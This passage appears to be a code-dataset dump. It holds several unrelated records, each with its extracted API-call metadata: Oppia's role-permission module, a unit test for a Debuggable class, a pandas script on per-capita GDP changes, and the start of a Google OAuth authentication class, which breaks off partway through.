"sqlalchemy.DateTime",
"sqlalchemy.sql.func.count",
"sqlalchemy.select",
"sqlalchemy.String",
"sqlalchemy.ForeignKey",
"sqlalchemy.orm.Session",
"sqlalchemy.CheckConstraint",
"sqlalchemy.Numeric",
"sqlalchemy.create_engine",
"sqlalchemy.Integer"
] |
[((300, 349), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///Sqlite-Data/sqlite3.db"""'], {}), "('sqlite:///Sqlite-Data/sqlite3.db')\n", (313, 349), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((360, 380), 'sqlalchemy.orm.Session', 'Session', ([], {'bind': 'engine'}), '(bind=engine)\n', (367, 380), False, 'from sqlalchemy.orm import Session\n'), ((392, 402), 'sqlalchemy.MetaData', 'MetaData', ([], {}), '()\n', (400, 402), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((4741, 4760), 'sqlalchemy.select', 'select', (['[customers]'], {}), '([customers])\n', (4747, 4760), False, 'from sqlalchemy import select\n'), ((1455, 1509), 'sqlalchemy.CheckConstraint', 'CheckConstraint', (['"""quantity > 0"""'], {'name': '"""quantity_check"""'}), "('quantity > 0', name='quantity_check')\n", (1470, 1509), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((476, 485), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (483, 485), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((545, 556), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (551, 556), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((613, 624), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (619, 624), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((680, 690), 'sqlalchemy.String', 'String', (['(50)'], {}), '(50)\n', (686, 690), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((743, 754), 'sqlalchemy.String', 'String', (['(200)'], {}), '(200)\n', (749, 754), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((809, 820), 'sqlalchemy.String', 'String', (['(200)'], {}), '(200)\n', (815, 820), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((872, 882), 'sqlalchemy.String', 'String', (['(50)'], {}), '(50)\n', (878, 882), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((940, 950), 'sqlalchemy.DateTime', 'DateTime', ([], {}), '()\n', (948, 950), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1014, 1024), 'sqlalchemy.DateTime', 'DateTime', ([], {}), '()\n', (1022, 1024), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1152, 1161), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', 
(1159, 1161), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1211, 1222), 'sqlalchemy.String', 'String', (['(200)'], {}), '(200)\n', (1217, 1222), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1276, 1290), 'sqlalchemy.Numeric', 'Numeric', (['(10)', '(2)'], {}), '(10, 2)\n', (1283, 1290), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1347, 1361), 'sqlalchemy.Numeric', 'Numeric', (['(10)', '(2)'], {}), '(10, 2)\n', (1354, 1361), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1413, 1422), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (1420, 1422), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1590, 1599), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (1597, 1599), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1657, 1683), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""customers.id"""'], {}), "('customers.id')\n", (1667, 1683), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1723, 1733), 'sqlalchemy.DateTime', 'DateTime', ([], {}), '()\n', (1731, 1733), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1796, 1806), 'sqlalchemy.DateTime', 'DateTime', ([], {}), '()\n', (1804, 1806), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1904, 1913), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (1911, 1913), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1973, 1996), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""orders.id"""'], {}), "('orders.id')\n", (1983, 1996), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((2037, 2059), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""items.id"""'], {}), "('items.id')\n", (2047, 2059), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((2101, 2110), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (2108, 2110), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((4880, 4895), 'sqlalchemy.select', 'select', (['[items]'], {}), '([items])\n', (4886, 4895), False, 'from sqlalchemy import select\n'), ((5184, 5200), 'sqlalchemy.select', 'select', (['[orders]'], {}), '([orders])\n', (5190, 
5200), False, 'from sqlalchemy import select\n'), ((5581, 5590), 'sqlalchemy.select', 'select', (['c'], {}), '(c)\n', (5587, 5590), False, 'from sqlalchemy import select\n'), ((5013, 5028), 'sqlalchemy.select', 'select', (['[items]'], {}), '([items])\n', (5019, 5028), False, 'from sqlalchemy import select\n'), ((5521, 5536), 'sqlalchemy.sql.func.count', 'func.count', (['"""*"""'], {}), "('*')\n", (5531, 5536), False, 'from sqlalchemy.sql import func\n'), ((5339, 5354), 'sqlalchemy.select', 'select', (['[items]'], {}), '([items])\n', (5345, 5354), False, 'from sqlalchemy import select\n')]
|
# coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains the structure of roles and actions,
actions permitted to the roles and the functions needed to access roles
and actions.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import copy
import math
import random
import time
from core.platform import models
import feconf
(audit_models,) = models.Registry.import_models([models.NAMES.audit])
# Actions that can be performed in the system.
ACTION_ACCEPT_ANY_SUGGESTION = 'ACCEPT_ANY_SUGGESTION'
ACTION_ACCEPT_ANY_VOICEOVER_APPLICATION = (
'ACTION_ACCEPT_ANY_VOICEOVER_APPLICATION')
ACTION_ACCESS_CREATOR_DASHBOARD = 'ACCESS_CREATOR_DASHBOARD'
ACTION_ACCESS_LEARNER_DASHBOARD = 'ACCESS_LEARNER_DASHBOARD'
ACTION_ACCESS_MODERATOR_PAGE = 'ACCESS_MODERATOR_PAGE'
ACTION_ACCESS_RELEASE_COORDINATOR_PAGE = 'ACCESS_RELEASE_COORDINATOR_PAGE'
ACTION_ACCESS_TOPICS_AND_SKILLS_DASHBOARD = 'ACCESS_TOPICS_AND_SKILLS_DASHBOARD'
ACTION_CHANGE_TOPIC_STATUS = 'CHANGE_TOPIC_STATUS'
ACTION_CHANGE_STORY_STATUS = 'CHANGE_STORY_STATUS'
ACTION_CREATE_COLLECTION = 'CREATE_COLLECTION'
ACTION_CREATE_EXPLORATION = 'CREATE_EXPLORATION'
ACTION_CREATE_NEW_SKILL = 'CREATE_NEW_SKILL'
ACTION_CREATE_NEW_TOPIC = 'CREATE_NEW_TOPIC'
ACTION_MANAGE_QUESTION_SKILL_STATUS = 'MANAGE_QUESTION_SKILL_STATUS'
ACTION_DELETE_ANY_ACTIVITY = 'DELETE_ANY_ACTIVITY'
ACTION_DELETE_ANY_PUBLIC_ACTIVITY = 'DELETE_ANY_PUBLIC_ACTIVITY'
ACTION_DELETE_ANY_QUESTION = 'DELETE_ANY_QUESTION'
ACTION_DELETE_ANY_SKILL = 'DELETE_ANY_SKILL'
ACTION_DELETE_OWNED_PRIVATE_ACTIVITY = 'DELETE_OWNED_PRIVATE_ACTIVITY'
ACTION_DELETE_TOPIC = 'DELETE_TOPIC'
ACTION_EDIT_ANY_ACTIVITY = 'EDIT_ANY_ACTIVITY'
ACTION_EDIT_ANY_PUBLIC_ACTIVITY = 'EDIT_ANY_PUBLIC_ACTIVITY'
ACTION_EDIT_ANY_QUESTION = 'EDIT_ANY_QUESTION'
ACTION_EDIT_ANY_SKILL = 'EDIT_ANY_SKILL'
ACTION_EDIT_ANY_SUBTOPIC_PAGE = 'EDIT_ANY_SUBTOPIC_PAGE'
ACTION_EDIT_ANY_TOPIC = 'EDIT_ANY_TOPIC'
ACTION_EDIT_ANY_BLOG_POST = 'EDIT_ANY_BLOG_POST'
ACTION_RUN_ANY_JOB = 'RUN_ANY_JOB'
ACTION_EDIT_ANY_STORY = 'EDIT_ANY_STORY'
ACTION_EDIT_OWNED_ACTIVITY = 'EDIT_OWNED_ACTIVITY'
ACTION_EDIT_OWNED_TOPIC = 'EDIT_OWNED_TOPIC'
ACTION_EDIT_OWNED_STORY = 'EDIT_OWNED_STORY'
ACTION_EDIT_SKILL_DESCRIPTION = 'EDIT_SKILL_DESCRIPTION'
ACTION_EDIT_SKILLS = 'EDIT_SKILLS'
ACTION_FLAG_EXPLORATION = 'FLAG_EXPLORATION'
ACTION_MANAGE_ACCOUNT = 'MANAGE_ACCOUNT'
ACTION_MANAGE_EMAIL_DASHBOARD = 'MANAGE_EMAIL_DASHBOARD'
ACTION_MANAGE_MEMCACHE = 'MANAGE_MEMCACHE'
ACTION_MANAGE_QUESTION_RIGHTS = 'MANAGE_QUESTION_RIGHTS'
ACTION_MANAGE_TOPIC_RIGHTS = 'MANAGE_TOPIC_RIGHTS'
ACTION_MODIFY_ROLES_FOR_ANY_ACTIVITY = 'MODIFY_ROLES_FOR_ANY_ACTIVITY'
ACTION_MODIFY_ROLES_FOR_OWNED_ACTIVITY = 'MODIFY_ROLES_FOR_OWNED_ACTIVITY'
ACTION_PLAY_ANY_PRIVATE_ACTIVITY = 'PLAY_ANY_PRIVATE_ACTIVITY'
ACTION_PLAY_ANY_PUBLIC_ACTIVITY = 'PLAY_ANY_PUBLIC_ACTIVITY'
ACTION_PUBLISH_ANY_ACTIVITY = 'PUBLISH_ANY_ACTIVITY'
ACTION_PUBLISH_OWNED_ACTIVITY = 'PUBLISH_OWNED_ACTIVITY'
ACTION_PUBLISH_OWNED_SKILL = 'PUBLISH_OWNED_SKILL'
ACTION_RATE_ANY_PUBLIC_EXPLORATION = 'RATE_ANY_PUBLIC_EXPLORATION'
ACTION_SEND_MODERATOR_EMAILS = 'SEND_MODERATOR_EMAILS'
ACTION_SUBMIT_VOICEOVER_APPLICATION = 'ACTION_SUBMIT_VOICEOVER_APPLICATION'
ACTION_SUBSCRIBE_TO_USERS = 'SUBSCRIBE_TO_USERS'
ACTION_SUGGEST_CHANGES = 'SUGGEST_CHANGES'
ACTION_UNPUBLISH_ANY_PUBLIC_ACTIVITY = 'UNPUBLISH_ANY_PUBLIC_ACTIVITY'
ACTION_VISIT_ANY_QUESTION_EDITOR = 'VISIT_ANY_QUESTION_EDITOR'
ACTION_VISIT_ANY_TOPIC_EDITOR = 'VISIT_ANY_TOPIC_EDITOR'
# Users can be updated to any of the following role IDs via the admin
# interface.
#
# NOTE: The LEARNER role should not be updated to any other role, so do not
# add it to the following list.
UPDATABLE_ROLES = [
feconf.ROLE_ID_ADMIN,
feconf.ROLE_ID_BANNED_USER,
feconf.ROLE_ID_COLLECTION_EDITOR,
feconf.ROLE_ID_EXPLORATION_EDITOR,
feconf.ROLE_ID_MODERATOR,
feconf.ROLE_ID_RELEASE_COORDINATOR,
feconf.ROLE_ID_TOPIC_MANAGER
]
# Users with the following role IDs can be viewed via the admin interface.
#
# NOTE: Do not include the LEARNER role in this list, as it does not represent
# a role for a separate user account, but rather a profile within the account.
VIEWABLE_ROLES = [
feconf.ROLE_ID_ADMIN,
feconf.ROLE_ID_BANNED_USER,
feconf.ROLE_ID_COLLECTION_EDITOR,
feconf.ROLE_ID_MODERATOR,
feconf.ROLE_ID_RELEASE_COORDINATOR,
feconf.ROLE_ID_TOPIC_MANAGER
]
# The string corresponding to role IDs that should be visible to admin.
HUMAN_READABLE_ROLES = {
feconf.ROLE_ID_ADMIN: 'admin',
feconf.ROLE_ID_BANNED_USER: 'banned user',
feconf.ROLE_ID_COLLECTION_EDITOR: 'collection editor',
feconf.ROLE_ID_EXPLORATION_EDITOR: 'exploration editor',
feconf.ROLE_ID_GUEST: 'guest',
feconf.ROLE_ID_LEARNER: 'learner',
feconf.ROLE_ID_MODERATOR: 'moderator',
feconf.ROLE_ID_RELEASE_COORDINATOR: 'release coordinator',
feconf.ROLE_ID_TOPIC_MANAGER: 'topic manager'
}
# TODO(#12755): Remove this function once user roles are independent and
# no longer need _get_unique_actions_list to generate the unique actions.
# Defining a function before the module constants is unconventional, but
# _get_unique_actions_list is needed here because it generates the values
# for the constants below.
def _get_unique_actions_list(*actions):
"""Returns a list of unique actions out of the given list of actions.
Args:
        *actions: list(str). List of actions which can contain duplicate items.
Returns:
list(str). A list of unique action strings.
"""
return list(set(actions))
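# For example, _get_unique_actions_list('A', 'B', 'A') returns ['A', 'B']
# (in arbitrary order, since deduplication goes through a set).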
_GUEST_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_PLAY_ANY_PUBLIC_ACTIVITY)
_LEARNER_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_FLAG_EXPLORATION,
ACTION_ACCESS_LEARNER_DASHBOARD,
*_GUEST_ALLOWED_ACTIONS)
_EXPLORATION_EDITOR_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCESS_CREATOR_DASHBOARD,
ACTION_CREATE_EXPLORATION,
ACTION_DELETE_OWNED_PRIVATE_ACTIVITY,
ACTION_EDIT_OWNED_ACTIVITY,
ACTION_SUBSCRIBE_TO_USERS,
ACTION_MANAGE_ACCOUNT,
ACTION_MODIFY_ROLES_FOR_OWNED_ACTIVITY,
ACTION_PUBLISH_OWNED_ACTIVITY,
ACTION_RATE_ANY_PUBLIC_EXPLORATION,
ACTION_SUGGEST_CHANGES,
ACTION_SUBMIT_VOICEOVER_APPLICATION,
*_LEARNER_ALLOWED_ACTIONS)
_COLLECTION_EDITOR_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_CREATE_COLLECTION,
*_EXPLORATION_EDITOR_ALLOWED_ACTIONS)
_TOPIC_MANAGER_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCESS_TOPICS_AND_SKILLS_DASHBOARD,
ACTION_DELETE_ANY_QUESTION,
ACTION_EDIT_ANY_QUESTION,
ACTION_EDIT_OWNED_STORY,
ACTION_EDIT_OWNED_TOPIC,
ACTION_EDIT_SKILLS,
ACTION_EDIT_ANY_SUBTOPIC_PAGE,
ACTION_MANAGE_QUESTION_SKILL_STATUS,
ACTION_VISIT_ANY_QUESTION_EDITOR,
ACTION_VISIT_ANY_TOPIC_EDITOR,
*_COLLECTION_EDITOR_ALLOWED_ACTIONS)
_MODERATOR_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCESS_MODERATOR_PAGE,
ACTION_DELETE_ANY_PUBLIC_ACTIVITY,
ACTION_EDIT_ANY_PUBLIC_ACTIVITY,
ACTION_PLAY_ANY_PRIVATE_ACTIVITY,
ACTION_SEND_MODERATOR_EMAILS,
ACTION_UNPUBLISH_ANY_PUBLIC_ACTIVITY,
*_TOPIC_MANAGER_ALLOWED_ACTIONS)
_RELEASE_COORDINATOR_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCESS_RELEASE_COORDINATOR_PAGE,
ACTION_MANAGE_MEMCACHE,
ACTION_RUN_ANY_JOB,
*_EXPLORATION_EDITOR_ALLOWED_ACTIONS)
_ADMIN_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCEPT_ANY_SUGGESTION,
ACTION_ACCEPT_ANY_VOICEOVER_APPLICATION,
ACTION_CHANGE_STORY_STATUS,
ACTION_CHANGE_TOPIC_STATUS,
ACTION_CREATE_NEW_SKILL,
ACTION_CREATE_NEW_TOPIC,
ACTION_DELETE_ANY_ACTIVITY,
ACTION_DELETE_ANY_SKILL,
ACTION_DELETE_TOPIC,
ACTION_EDIT_ANY_ACTIVITY,
ACTION_EDIT_ANY_STORY,
ACTION_EDIT_ANY_TOPIC,
ACTION_EDIT_SKILLS,
ACTION_EDIT_SKILL_DESCRIPTION,
ACTION_MANAGE_EMAIL_DASHBOARD,
ACTION_MANAGE_TOPIC_RIGHTS,
ACTION_MODIFY_ROLES_FOR_ANY_ACTIVITY,
ACTION_PUBLISH_ANY_ACTIVITY,
ACTION_PUBLISH_OWNED_SKILL,
*_MODERATOR_ALLOWED_ACTIONS)
# This dict represents all the actions that belong to a particular role.
_ROLE_ACTIONS = {
feconf.ROLE_ID_ADMIN: _ADMIN_ALLOWED_ACTIONS,
feconf.ROLE_ID_BANNED_USER: [],
feconf.ROLE_ID_COLLECTION_EDITOR: _COLLECTION_EDITOR_ALLOWED_ACTIONS,
feconf.ROLE_ID_EXPLORATION_EDITOR: _EXPLORATION_EDITOR_ALLOWED_ACTIONS,
feconf.ROLE_ID_GUEST: _GUEST_ALLOWED_ACTIONS,
feconf.ROLE_ID_LEARNER: _LEARNER_ALLOWED_ACTIONS,
feconf.ROLE_ID_MODERATOR: _MODERATOR_ALLOWED_ACTIONS,
feconf.ROLE_ID_RELEASE_COORDINATOR: _RELEASE_COORDINATOR_ALLOWED_ACTIONS,
feconf.ROLE_ID_TOPIC_MANAGER: _TOPIC_MANAGER_ALLOWED_ACTIONS
}
def get_all_actions(role):
"""Returns a list of all actions that can be performed by the given role.
Args:
role: str. A string defining the user role.
Returns:
list(str). A list of actions accessible to the role.
Raises:
Exception. The given role does not exist.
"""
if role not in _ROLE_ACTIONS:
raise Exception('Role %s does not exist.' % role)
role_actions = _ROLE_ACTIONS[role]
return role_actions
def get_role_actions():
"""Returns the possible role to actions items in the application.
Returns:
dict(str, list(str)). A dict presenting key as role and values as list
of actions corresponding to the given role.
"""
return copy.deepcopy(_ROLE_ACTIONS)
def is_valid_role(role):
"""Validates whether the given role is valid.
Args:
role: str. The role to validate.
Returns:
bool. Whether the given role is valid or not.
"""
return role in _ROLE_ACTIONS
def log_role_query(user_id, intent, role=None, username=None):
"""Stores the query to role structure in RoleQueryAuditModel."""
model_id = '%s.%s.%s.%s' % (
user_id, int(math.floor(time.time())), intent, random.randint(0, 1000)
)
model = audit_models.RoleQueryAuditModel(
id=model_id, user_id=user_id, intent=intent,
role=role, username=username)
model.update_timestamps()
model.put()
|
[
"copy.deepcopy",
"core.platform.models.Registry.import_models",
"random.randint",
"time.time"
] |
[((1048, 1099), 'core.platform.models.Registry.import_models', 'models.Registry.import_models', (['[models.NAMES.audit]'], {}), '([models.NAMES.audit])\n', (1077, 1099), False, 'from core.platform import models\n'), ((10115, 10143), 'copy.deepcopy', 'copy.deepcopy', (['_ROLE_ACTIONS'], {}), '(_ROLE_ACTIONS)\n', (10128, 10143), False, 'import copy\n'), ((10604, 10627), 'random.randint', 'random.randint', (['(0)', '(1000)'], {}), '(0, 1000)\n', (10618, 10627), False, 'import random\n'), ((10581, 10592), 'time.time', 'time.time', ([], {}), '()\n', (10590, 10592), False, 'import time\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8; mode: python; py-indent-offset: 4; py-continuation-offset: 4 -*-
#===============================================================================
# Copyright Notice
# ----------------
# Copyright 2021 National Technology & Engineering Solutions of Sandia,
# LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# License (3-Clause BSD)
# ----------------------
# Copyright 2021 National Technology & Engineering Solutions of Sandia,
# LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
"""
"""
from __future__ import print_function
import sys
sys.dont_write_bytecode = True
import os
sys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import unittest
from unittest import TestCase
# Coverage will always miss one of these depending on the system
# and what is available.
try: # pragma: no cover
import unittest.mock as mock # pragma: no cover
except: # pragma: no cover
import mock # pragma: no cover
from mock import Mock
from mock import MagicMock
from mock import patch
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from configparserenhanced import Debuggable
from .common import *
#===============================================================================
#
# General Utility Functions
#
#===============================================================================
#===============================================================================
#
# Mock Helpers
#
#===============================================================================
#===============================================================================
#
# Tests
#
#===============================================================================
class DebuggableTest(TestCase):
"""
    Main test driver for the Debuggable class
"""
def setUp(self):
print("")
return
def test_Debuggable_property_debug_level(self):
"""
Test reading and setting the property `debug_level`
"""
class testme(Debuggable):
def __init__(self):
return
inst_testme = testme()
self.assertEqual(0, inst_testme.debug_level)
inst_testme.debug_level = 1
self.assertEqual(1, inst_testme.debug_level)
inst_testme.debug_level = 5
self.assertEqual(5, inst_testme.debug_level)
inst_testme.debug_level = 100
self.assertEqual(100, inst_testme.debug_level)
inst_testme.debug_level = 0
self.assertEqual(0, inst_testme.debug_level)
inst_testme.debug_level = -1
self.assertEqual(0, inst_testme.debug_level)
print("OK")
return 0
def test_Debuggable_method_debug_message(self):
class testme(Debuggable):
def __init__(self):
return
inst_testme = testme()
message = "This is a test message!"
with patch('sys.stdout', new=StringIO()) as fake_out:
inst_testme.debug_message(0, message, end="\n")
self.assertEqual(fake_out.getvalue(), message + "\n")
with patch('sys.stdout', new=StringIO()) as fake_out:
inst_testme.debug_message(1, message, end="\n")
self.assertEqual(fake_out.getvalue(), "")
inst_testme.debug_level = 3
with patch('sys.stdout', new=StringIO()) as fake_out:
inst_testme.debug_message(3, message, end="\n")
self.assertEqual(fake_out.getvalue(), "[D-3] " + message + "\n")
inst_testme.debug_level = 2
with patch('sys.stdout', new=StringIO()) as fake_out:
inst_testme.debug_message(0, "A", end="", useprefix=False)
inst_testme.debug_message(1, "B", end="", useprefix=False)
inst_testme.debug_message(2, "C", end="", useprefix=False)
inst_testme.debug_message(3, "D", end="", useprefix=False)
inst_testme.debug_message(4, "E", end="", useprefix=False)
self.assertEqual(fake_out.getvalue(), "ABC")
print("OK")
return 0
# EOF
|
[
"os.path.abspath",
"io.StringIO"
] |
[((2417, 2442), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (2432, 2442), False, 'import os\n'), ((4817, 4827), 'io.StringIO', 'StringIO', ([], {}), '()\n', (4825, 4827), False, 'from io import StringIO\n'), ((5006, 5016), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5014, 5016), False, 'from io import StringIO\n'), ((5219, 5229), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5227, 5229), False, 'from io import StringIO\n'), ((5455, 5465), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5463, 5465), False, 'from io import StringIO\n')]
|
import csv
import numpy as np
import pandas as pd
datapath = './data/Per capita GDP at current prices - US Dollars.csv'
df = pd.read_csv(datapath, header=0)
df = df.sort_values('Year', ascending=True)
df = df[df['Country or Area']=='Venezuela (Bolivarian Republic of)']
df = df[['Year', 'Value']]
# Prints summary stats for Venezuelan GDP 1970-2017 (Table 1)
print('-------------Venezuelan Per Capita GDP % Change, 1970-2017 (Current US Dollars)----------------')
print(df['Value'].pct_change(axis='rows').describe())
print('')
# Prints summary stats for Venezuelan GDP 1999 - 2013 (Table 1)
df2 = df[df['Year'] >= 1999]
df2 = df2[df2['Year'] <= 2013]
print('-------------Venezuelan Per Capita GDP % Change, 1999-2013 (Current US Dollars)----------------')
print(df2['Value'].pct_change(axis='rows').describe())
print('')
# Prints summary stats for Venezuelan GDP 2013 - 2017 (Table 1)
print('-------------Venezuelan Per Capita GDP % Change, 2013-2017 (Current US Dollars)----------------')
df3 = df[df['Year'] >= 2013]
print(df3['Value'].pct_change(axis='rows').describe())
print('')
# Prints summary stats for world GDP growth in 2017 (Table 2)
df = pd.read_csv(datapath, header=0)
df = df[df['Year'] >= 2016]
df = df.dropna()
df = df[df.duplicated(subset=['Country or Area'], keep=False)]
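# Reshape the long-format (country, year, value) rows into one row per country
# with separate 2016 and 2017 columns so pct_change can run across the columns.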
obj = {'Country': [], '2016' : [], '2017' : []}
for index, row in df.iterrows():
if row['Country or Area'] not in obj['Country']:
obj['Country'].append(row['Country or Area'])
if row['Year'] == 2016:
obj['2016'].append(row['Value'])
if row['Year'] == 2017:
obj['2017'].append(row['Value'])
df = pd.DataFrame(data={'2016': obj['2016'], '2017': obj['2017']}, index=obj['Country'])
df = df.rename(columns={'2017': 'Value'})
print('------------- International Per Capita GDP % Change, 2016-2017 (Current US Dollars)----------------')
print(df.pct_change(axis='columns')['Value'].describe())
|
[
"pandas.read_csv",
"pandas.DataFrame"
] |
[((126, 157), 'pandas.read_csv', 'pd.read_csv', (['datapath'], {'header': '(0)'}), '(datapath, header=0)\n', (137, 157), True, 'import pandas as pd\n'), ((1154, 1185), 'pandas.read_csv', 'pd.read_csv', (['datapath'], {'header': '(0)'}), '(datapath, header=0)\n', (1165, 1185), True, 'import pandas as pd\n'), ((1619, 1707), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': "{'2016': obj['2016'], '2017': obj['2017']}", 'index': "obj['Country']"}), "(data={'2016': obj['2016'], '2017': obj['2017']}, index=obj[\n 'Country'])\n", (1631, 1707), True, 'import pandas as pd\n')]
|
import os
import pickle
from shutil import copyfile
from pathlib import Path
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
import googleapiclient.errors
from config import FOLDER_CHANNELS
class Authentication:
def __init__(self,
first_time: bool = None,
new_client_secrets: bool = None,
channel_id_secrets: str = None,
channel_id: str = None):
# Conditions on the inputs: there are three cases
self.case_first_time_reuse_secrets = first_time and not new_client_secrets and bool(
channel_id_secrets)
